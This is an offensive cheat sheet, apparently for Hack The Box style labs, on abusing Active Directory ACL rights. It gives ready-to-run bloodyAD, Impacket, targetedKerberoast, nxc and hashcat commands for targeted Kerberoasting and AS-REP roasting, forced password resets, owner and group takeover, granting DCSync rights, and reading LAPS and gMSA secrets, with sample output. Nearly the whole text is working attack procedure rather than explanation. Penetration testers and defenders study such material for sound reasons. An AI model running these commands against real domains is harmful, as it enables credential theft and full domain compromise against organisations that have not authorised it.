AD ACL


GenericWrite-User

You have multiple options here

Targeted Kerberoast

We can set a SPN on targeted user and perform usual Kerberoast attack.
# Add SPN
bloodyAD -k --host 'DC01.BOX.HTB' --dc-ip '10.129.41.25' -d 'BOX.HTB' -u 'USER' set object TARGETEDUSER servicePrincipalName -v 'what/ever'
# bloodyAD -k --host 'DC01.BOX.HTB' --dc-ip '10.129.41.25' -d 'VINTAGE.HTB' -u 'USER' get object TARGETEDUSER --attr servicePrincipalName

# Ask TGS
GetUserSPNs.py 'BOX.HTB'/'USER' -k -no-pass -dc-ip 'DC01.BOX.HTB' -dc-host 'DC01.BOX.HTB' -request-user TARGETEDUSER -outputfile /tmp/hashes.kerberoast

# Remove SPN
bloodyAD -k --host 'DC01.BOX.HTB' --dc-ip '10.129.41.25' -d 'BOX.HTB' -u 'USER' set object TARGETEDUSER servicePrincipalName
You can also use targetedKerberoast tool that automate this process…
targetedKerberoast will add SPN for any vulnerable user, ask TGS and finally remove added SPN.
git clone https://github.com/ShutdownRepo/targetedKerberoast.git /opt/git/targetedKerberoast
pip3 install -r /opt/git/targetedKerberoast/requirements.txt
python3 /opt/git/targetedKerberoast/targetedKerberoast.py -v -d 'box.htb' -u 'user' -p 'pass'

# If you get clock errors please sync with DC ntp
# sudo rdate -n 10.129.75.247

Then use hashcat to crack the hash (TGS)
hashcat -m 13100 /tmp/hash /usr/share/wordlists/rockyou.txt --potfile-path=/home/user/HASHCATPOT

Targeted AS-REP

Pretty close to targeted kerberoast method,
we set the DONT_REQ_PREAUTH property on targeted user to perform targeted AS-REP Roasting
bloodyAD -k --host 'DC01.BOX.HTB' --dc-ip '10.129.41.25' -d 'BOX.HTB' -u 'COMPROMISEDACCOUNT' add uac TARGETEDACCOUNT -f DONT_REQ_PREAUTH
[-] ['DONT_REQ_PREAUTH'] property flags added to TARGETEDACCOUNT's userAccountControl

GetNPUsers.py 'BOX.HTB'/'COMPROMISEDACCOUNT' -k -no-pass -dc-ip 'DC01.BOX.HTB' -dc-host 'DC01.BOX.HTB' -usersfile <(echo -e 'TARGETEDACCOUNT') -outputfile /tmp/hashes.asreproast -format hashcat
$krb5asrep$23$TARGETEDACCOUNT@BOX.HTB:xxxxxxxxxxxxxx

hashcat -m 18200 -a 0 hashes.asreproast /usr/share/wordlists/rockyou.txt --potfile-path=HASHCATPOT

Enable user

That not an attack, but you can enable disabled account
bloodyAD -k --host 'DC01.BOX.HTB' --dc-ip '10.129.41.25' -d 'BOX.HTB' -u 'USER' remove uac TARGETEDUSER -f ACCOUNTDISABLE
[-] ['ACCOUNTDISABLE'] property flags removed from TARGETEDUSER's userAccountControl

GenericAll-User

(GenericAll contains GenericWrite)

Set Password

If you have GenericAll access against an user, you can set the user’s password.
(You probably want to try GenericWrite methods first to retrieve the user’s hash before losing it)
net user robert FNUEOFNSIDsilfelifsef_1 /domain

From linux
# With password
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' set password VICTIM Pototo_123

# With NT HASH
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p ':NTHASH' set password VICTIM Pototo_123

WriteOwner-User

You can set VICTIM’s owner to USER,
then you grants USERS rights on VICTIM.
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' set owner VICTIM USER
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' add genericAll VICTIM USER
#bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' set password VICTIM Pototo_123

WriteOwner-Group

Change owner of group
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' set owner 'TheSuperAdminGroup' 'USER'

Owner-Group

Grant genericAll right to TheSuperAdminGroup for USER
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' add genericAll 'TheSuperAdminGroup' 'USER'

GenericAll-Group

Add USER to group
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' add groupMember 'TheSuperAdminGroup' 'USER'

ReadLAPSPassword

nxc ldap 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' --module laps

WriteDacl

You can add any ACL you want, like DCSync
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' setDCSync USER

ReadGMSAPassword

You can retrieve gMSA account’s NT hash
bloodyAD -k --host 'DC01.BOX.HTB' --dc-ip '10.129.41.25' -d 'BOX.HTB' -u 'USER' -p 'PASS' get object 'GMSA01$' --attr msDS-ManagedPassword
nxc ldap BOX.HTB -u 'USER' -p 'PASS' --gmsa

WriteSPN

You can perform Targeted Kerberoast